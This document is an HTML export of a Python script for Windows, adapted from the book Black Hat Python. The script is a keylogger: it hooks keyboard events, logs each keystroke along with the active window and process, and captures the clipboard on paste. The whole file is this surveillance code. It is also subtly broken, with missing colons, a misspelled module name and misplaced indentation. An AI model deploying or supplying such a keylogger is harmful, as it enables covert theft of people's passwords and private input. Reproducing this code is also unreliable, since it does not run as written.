<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd">
<html>
<head>
<META http-equiv=Content-Type content="text/html; charset=UTF-8">
<title>Exported from Notepad++</title>
<style type="text/css">
span {
	font-family: 'Courier New';
	font-size: 10pt;
	color: #000000;
}
.sc0 {
}
.sc1 {
	color: #008000;
}
.sc2 {
	color: #FF0000;
}
.sc3 {
	color: #808080;
}
.sc5 {
	font-weight: bold;
	color: #0000FF;
}
.sc9 {
	color: #FF00FF;
}
.sc10 {
	font-weight: bold;
	color: #000080;
}
.sc11 {
}
</style>
</head>
<body>
<div style="float: left; white-space: pre; line-height: 1; background: #FFFFFF; "><span class="sc1">#////////////////////////////////////////////////////////////</span><span class="sc0">
</span><span class="sc1">#pyCodeExample.py</span><span class="sc0">
</span><span class="sc1">#</span><span class="sc0">
</span><span class="sc1">#description:</span><span class="sc0">
</span><span class="sc1">#This a script that takes advantage of the native windows process</span><span class="sc0">
</span><span class="sc1">#SetWindowsHookEx and allows a hook registered for keyboard events</span><span class="sc0">
</span><span class="sc1">#This example was retrieved from Black Hat Python </span><span class="sc0">
</span><span class="sc1">#Python Programming for Hackers and Pentesters</span><span class="sc0">
</span><span class="sc1">#by Justin Seitz</span><span class="sc0">
</span><span class="sc1">#</span><span class="sc0">
</span><span class="sc1">#functions:</span><span class="sc0">
</span><span class="sc1"># get_current_process()</span><span class="sc0">
</span><span class="sc1"># KeyStroke()</span><span class="sc0">
</span><span class="sc1">#</span><span class="sc0">
</span><span class="sc1">#Copywright 2017 &amp;copy; rrespino.com</span><span class="sc0">
</span><span class="sc1"># All rights reserved  </span><span class="sc0">
</span><span class="sc1">#=================================================================================</span><span class="sc0">
</span><span class="sc1">#</span><span class="sc0">
</span><span class="sc1">#Edits and Profreading done</span><span class="sc0">
</span><span class="sc1"># by:___________________  Date:__|__|__</span><span class="sc0">
</span><span class="sc1">#   Note:_____________________________________</span><span class="sc0">
</span><span class="sc1">#      rrespino.com            2017</span><span class="sc0">
</span><span class="sc1">#          Cleanup for iframe rendering</span><span class="sc0">
</span><span class="sc1">#</span><span class="sc0">
</span><span class="sc1">#---------------------------------------------------------------------------------</span><span class="sc0">
</span><span class="sc1">#///////////////////////////////////////////////////////////    </span><span class="sc0">

</span><span class="sc5">from</span><span class="sc0"> </span><span class="sc11">ctypes</span><span class="sc0"> </span><span class="sc5">import</span><span class="sc0"> </span><span class="sc10">*</span><span class="sc0">
</span><span class="sc5">import</span><span class="sc0"> </span><span class="sc11">pythoncom</span><span class="sc0">
</span><span class="sc5">import</span><span class="sc0"> </span><span class="sc11">pyHook</span><span class="sc0">
</span><span class="sc5">import</span><span class="sc0"> </span><span class="sc11">win32clipboard</span><span class="sc0">

</span><span class="sc11">user32</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc11">windll</span><span class="sc10">.</span><span class="sc11">user32</span><span class="sc0">
</span><span class="sc11">kernel32</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc11">windll</span><span class="sc10">.</span><span class="sc11">kernel32</span><span class="sc0">
</span><span class="sc11">psapi</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc11">windll</span><span class="sc10">.</span><span class="sc11">psapi</span><span class="sc0">
</span><span class="sc11">current_window</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc5">None</span><span class="sc0">

</span><span class="sc1">#////////////////////////////////////////////////////////////</span><span class="sc0">
</span><span class="sc1">#function get_current_process</span><span class="sc0">
</span><span class="sc1">#</span><span class="sc0">
</span><span class="sc1">#description:</span><span class="sc0">
</span><span class="sc1">#Used to capture the targets active window and its associated process_id</span><span class="sc0">
</span><span class="sc1">#</span><span class="sc0">
</span><span class="sc1">#Parameters:</span><span class="sc0">
</span><span class="sc1">#</span><span class="sc0">
</span><span class="sc1">#Functions Called:</span><span class="sc0">
</span><span class="sc1">#</span><span class="sc0">
</span><span class="sc1">#///////////////////////////////////////////////////////////    </span><span class="sc0">
</span><span class="sc5">def</span><span class="sc0"> </span><span class="sc9">get_current_process</span><span class="sc10">():</span><span class="sc0">

    </span><span class="sc1">#get a handle to the foreground window</span><span class="sc0">
    </span><span class="sc11">hwnd</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc11">user32</span><span class="sc10">.</span><span class="sc11">GetForegroundWindow</span><span class="sc10">()</span><span class="sc0">
    
    </span><span class="sc1">#find the process ID</span><span class="sc0">
    </span><span class="sc11">pid</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc11">c_ulong</span><span class="sc10">(</span><span class="sc2">0</span><span class="sc10">)</span><span class="sc0">
    </span><span class="sc11">user32</span><span class="sc10">.</span><span class="sc11">GetWindowThreadProcessId</span><span class="sc10">(</span><span class="sc11">hwnd</span><span class="sc10">,</span><span class="sc0"> </span><span class="sc11">byref</span><span class="sc10">(</span><span class="sc11">pid</span><span class="sc10">))</span><span class="sc0">
    
    </span><span class="sc1">#store the current process id</span><span class="sc0">
    </span><span class="sc11">process_id</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc3">"%d"</span><span class="sc0"> </span><span class="sc10">%</span><span class="sc0"> </span><span class="sc11">pid</span><span class="sc10">.</span><span class="sc11">value</span><span class="sc0">
    
    </span><span class="sc1">#grab the executable</span><span class="sc0">
    </span><span class="sc11">executable</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc11">create_string_buffer</span><span class="sc10">(</span><span class="sc3">"\x00"</span><span class="sc0"> </span><span class="sc10">*</span><span class="sc0"> </span><span class="sc2">512</span><span class="sc10">)</span><span class="sc0">
    </span><span class="sc11">h_process</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc11">kernel32</span><span class="sc10">.</span><span class="sc11">OpenProcess</span><span class="sc10">(</span><span class="sc2">0x400</span><span class="sc0"> </span><span class="sc10">|</span><span class="sc0"> </span><span class="sc2">0x10</span><span class="sc10">,</span><span class="sc0"> </span><span class="sc5">False</span><span class="sc10">,</span><span class="sc0"> </span><span class="sc11">pid</span><span class="sc10">)</span><span class="sc0">
    
    </span><span class="sc11">psapi</span><span class="sc10">.</span><span class="sc11">GetModuleBaseNameA</span><span class="sc10">(</span><span class="sc11">h_process</span><span class="sc10">,</span><span class="sc0"> </span><span class="sc5">None</span><span class="sc10">,</span><span class="sc0"> </span><span class="sc11">byref</span><span class="sc10">(</span><span class="sc11">executable</span><span class="sc10">),</span><span class="sc2">512</span><span class="sc10">)</span><span class="sc0">
    
    </span><span class="sc1">#now read its title</span><span class="sc0">
    </span><span class="sc11">window_title</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc11">create_string_buffer</span><span class="sc10">(</span><span class="sc3">"\x00"</span><span class="sc0"> </span><span class="sc10">*</span><span class="sc0"> </span><span class="sc2">512</span><span class="sc10">)</span><span class="sc0">
    </span><span class="sc11">length</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc11">user32</span><span class="sc10">.</span><span class="sc11">GetWindowTextA</span><span class="sc10">(</span><span class="sc11">hwnd</span><span class="sc10">,</span><span class="sc0"> </span><span class="sc11">byref</span><span class="sc10">(</span><span class="sc11">window_title</span><span class="sc10">),</span><span class="sc0"> </span><span class="sc2">512</span><span class="sc10">)</span><span class="sc0">
    
    </span><span class="sc1">#print out te header if we are in the right process</span><span class="sc0">
    </span><span class="sc5">print</span><span class="sc10">(</span><span class="sc3">"\n"</span><span class="sc10">)</span><span class="sc0">
    </span><span class="sc5">print</span><span class="sc10">(</span><span class="sc3">"[PID: %s - %s - %s ]"</span><span class="sc0"> </span><span class="sc10">%</span><span class="sc0"> </span><span class="sc10">(</span><span class="sc11">process_id</span><span class="sc10">,</span><span class="sc0"> </span><span class="sc11">executable</span><span class="sc10">.</span><span class="sc11">value</span><span class="sc10">,</span><span class="sc0"> </span><span class="sc11">window_title</span><span class="sc10">.</span><span class="sc11">value</span><span class="sc10">)</span><span class="sc0">
    </span><span class="sc5">print</span><span class="sc10">(</span><span class="sc3">"\n"</span><span class="sc10">)</span><span class="sc0">
    
    </span><span class="sc1">#close handles</span><span class="sc0">
    </span><span class="sc11">kernel32</span><span class="sc10">.</span><span class="sc11">CloseHandle</span><span class="sc10">(</span><span class="sc11">hwnd</span><span class="sc10">)</span><span class="sc0">
    </span><span class="sc11">kernel32</span><span class="sc10">.</span><span class="sc11">CloseHandle</span><span class="sc10">(</span><span class="sc11">h_process</span><span class="sc10">)</span><span class="sc0">
    
</span><span class="sc1">#////////////////////////////////////////////////////////////</span><span class="sc0">
</span><span class="sc1">#function KeyStroke</span><span class="sc0">
</span><span class="sc1">#</span><span class="sc0">
</span><span class="sc1">#description:</span><span class="sc0">
</span><span class="sc1">#Whenever Target presses a key on the keyboard this function is called</span><span class="sc0">
</span><span class="sc1">#</span><span class="sc0">
</span><span class="sc1">#Parameters:</span><span class="sc0">
</span><span class="sc1">#event object </span><span class="sc0">
</span><span class="sc1">#</span><span class="sc0">
</span><span class="sc1">#Functions Called:</span><span class="sc0">
</span><span class="sc1">#get_current_process()</span><span class="sc0">
</span><span class="sc1">#</span><span class="sc0">
</span><span class="sc1">#///////////////////////////////////////////////////////////    </span><span class="sc0">
</span><span class="sc5">def</span><span class="sc0"> </span><span class="sc9">KeyStroke</span><span class="sc10">(</span><span class="sc11">event</span><span class="sc10">):</span><span class="sc0">
    
    </span><span class="sc5">global</span><span class="sc0"> </span><span class="sc11">current_window</span><span class="sc0">
    
    </span><span class="sc1">#check to see if target changed windows</span><span class="sc0">
    </span><span class="sc5">if</span><span class="sc0"> </span><span class="sc11">event</span><span class="sc10">.</span><span class="sc11">WindowName</span><span class="sc0"> </span><span class="sc10">!=</span><span class="sc0"> </span><span class="sc11">current_window</span><span class="sc0">
        </span><span class="sc11">current_window</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc11">event</span><span class="sc10">.</span><span class="sc11">WindowName</span><span class="sc0">
        </span><span class="sc11">get_current_process</span><span class="sc10">();</span><span class="sc0">
        
    </span><span class="sc1">#if they pressed a standard key</span><span class="sc0">
    </span><span class="sc5">if</span><span class="sc0"> </span><span class="sc11">event</span><span class="sc10">.</span><span class="sc11">Ascii</span><span class="sc0"> </span><span class="sc10">&gt;</span><span class="sc0"> </span><span class="sc2">32</span><span class="sc0"> </span><span class="sc5">and</span><span class="sc0"> </span><span class="sc11">event</span><span class="sc10">.</span><span class="sc11">Ascii</span><span class="sc0"> </span><span class="sc10">&lt;</span><span class="sc0"> </span><span class="sc2">127</span><span class="sc10">:</span><span class="sc0">
        </span><span class="sc5">print</span><span class="sc0"> </span><span class="sc11">chr</span><span class="sc10">(</span><span class="sc11">event</span><span class="sc10">.</span><span class="sc11">Ascii</span><span class="sc10">)</span><span class="sc0">
    </span><span class="sc5">else</span><span class="sc10">:</span><span class="sc0">
        </span><span class="sc1">#if [Ctrl-V] get the value on the clipboard</span><span class="sc0">
        </span><span class="sc5">if</span><span class="sc0"> </span><span class="sc11">event</span><span class="sc10">.</span><span class="sc11">Key</span><span class="sc0"> </span><span class="sc10">==</span><span class="sc0"> </span><span class="sc3">"V"</span><span class="sc0">
        
        </span><span class="sc11">wind32clipboard</span><span class="sc10">.</span><span class="sc11">OpenClipboard</span><span class="sc10">()</span><span class="sc0">
        </span><span class="sc11">pasted_value</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc11">win32clipboard</span><span class="sc10">.</span><span class="sc11">GetClipboardData</span><span class="sc10">()</span><span class="sc0">
        </span><span class="sc11">win32clipboard</span><span class="sc10">.</span><span class="sc11">CloseClipboard</span><span class="sc10">()</span><span class="sc0">
        
        </span><span class="sc5">print</span><span class="sc10">(</span><span class="sc3">"[PASTE] - %s"</span><span class="sc0"> </span><span class="sc10">%</span><span class="sc0"> </span><span class="sc10">(</span><span class="sc11">pasted_value</span><span class="sc10">))</span><span class="sc0">
        
    </span><span class="sc5">else</span><span class="sc10">:</span><span class="sc0">
        </span><span class="sc5">print</span><span class="sc10">(</span><span class="sc3">"[%s]"</span><span class="sc0"> </span><span class="sc10">%</span><span class="sc0"> </span><span class="sc11">event</span><span class="sc10">.</span><span class="sc11">Key</span><span class="sc10">)</span><span class="sc0">
        
</span><span class="sc1">#pass execution to next hook registered</span><span class="sc0">
</span><span class="sc5">return</span><span class="sc0"> </span><span class="sc5">True</span><span class="sc0">

</span><span class="sc1">#create and register a hook manager</span><span class="sc0">
</span><span class="sc11">kl</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc11">pyHook</span><span class="sc10">.</span><span class="sc11">HookManager</span><span class="sc10">()</span><span class="sc0">
</span><span class="sc11">kl</span><span class="sc10">.</span><span class="sc11">KeyDown</span><span class="sc0"> </span><span class="sc10">=</span><span class="sc0"> </span><span class="sc11">KeyStroke</span><span class="sc0">

</span><span class="sc1">#register the hook and execute forever</span><span class="sc0">
</span><span class="sc11">kl</span><span class="sc10">.</span><span class="sc11">HookKeyboard</span><span class="sc10">()</span><span class="sc0">
</span><span class="sc11">pythoncom</span><span class="sc10">.</span><span class="sc11">PumpMessages</span><span class="sc10">()</span><span class="sc0">
    
    </span></div></body>
</html>
